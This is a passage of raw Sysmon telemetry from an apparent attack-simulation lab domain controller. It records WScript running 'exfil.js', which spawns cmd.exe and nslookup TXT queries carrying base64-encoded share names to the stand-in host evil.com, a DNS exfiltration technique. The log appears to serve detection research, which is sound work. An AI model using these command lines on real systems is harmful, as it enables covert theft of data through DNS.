14:21:34.861{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210070Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.861{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210069Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.861{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-1C44-000000005F02}7616C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210068Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.861{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210067Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.861{2E1864BB-18EE-629A-1A44-000000005F02}72807508C:\Windows\system32\cmd.exe{2E1864BB-18EE-629A-1C44-000000005F02}7616C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210066Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.861{2E1864BB-18EE-629A-1C44-000000005F02}7616C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EE-629A-1A44-000000005F02}7280C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlixvuv.tmp 2>&1 22542200x8000000000000000210065Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.720{00000000-0000-0000-0000-000000000000}7716evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000210064Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.652{00000000-0000-0000-0000-000000000000}3736evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000210063Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.587{00000000-0000-0000-0000-000000000000}6856evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000210062Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.518{00000000-0000-0000-0000-000000000000}7556evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000210061Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.228{00000000-0000-0000-0000-000000000000}4128evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000210060Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.141{00000000-0000-0000-0000-000000000000}7604evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000210059Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.055{00000000-0000-0000-0000-000000000000}8020evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000210058Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.001{00000000-0000-0000-0000-000000000000}7788evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000210057Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.925{00000000-0000-0000-0000-000000000000}7744evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000210056Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.852{00000000-0000-0000-0000-000000000000}6448evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000210055Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.829{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EE-629A-1B44-000000005F02}8188C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210054Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.829{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EE-629A-1B44-000000005F02}8188C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210053Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.829{2E1864BB-18EE-629A-1B44-000000005F02}81885012C:\Windows\system32\conhost.exe{2E1864BB-18EE-629A-1A44-000000005F02}7280C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210052Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.813{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-1B44-000000005F02}8188C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210051Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.813{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210050Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.813{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210049Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.813{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210048Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.813{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210047Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.813{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-1A44-000000005F02}7280C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210046Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.813{2E1864BB-18E0-629A-6742-000000005F02}39768136C:\Windows\System32\WScript.exe{2E1864BB-18EE-629A-1A44-000000005F02}7280C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210045Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.815{2E1864BB-18EE-629A-1A44-000000005F02}7280C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlixvuv.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000210044Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.798{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlnwtud.tmpMD5=72212EBDCB2E8E793A1B2134D4FA7DE3,SHA256=B332410D88A2D1B397F1BE63E741050D785B52E6644B4C66DB2FEDBE9A959973,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000210043Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.782{2E1864BB-18EE-629A-1844-000000005F02}27203764C:\Windows\system32\conhost.exe{2E1864BB-18EE-629A-1944-000000005F02}5516C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210042Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.782{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210041Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.782{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210040Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.782{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210039Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.782{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210038Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.782{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-1944-000000005F02}5516C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210037Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.782{2E1864BB-18EE-629A-1744-000000005F02}37926208C:\Windows\system32\cmd.exe{2E1864BB-18EE-629A-1944-000000005F02}5516C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210036Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.786{2E1864BB-18EE-629A-1944-000000005F02}5516C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EE-629A-1744-000000005F02}3792C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnwtud.tmp 2>&1 10341000x8000000000000000210035Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.759{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EE-629A-1844-000000005F02}2720C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210034Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.759{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EE-629A-1844-000000005F02}2720C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210033Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.743{2E1864BB-18EE-629A-1844-000000005F02}27203764C:\Windows\system32\conhost.exe{2E1864BB-18EE-629A-1744-000000005F02}3792C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210032Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.743{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-1844-000000005F02}2720C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210031Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 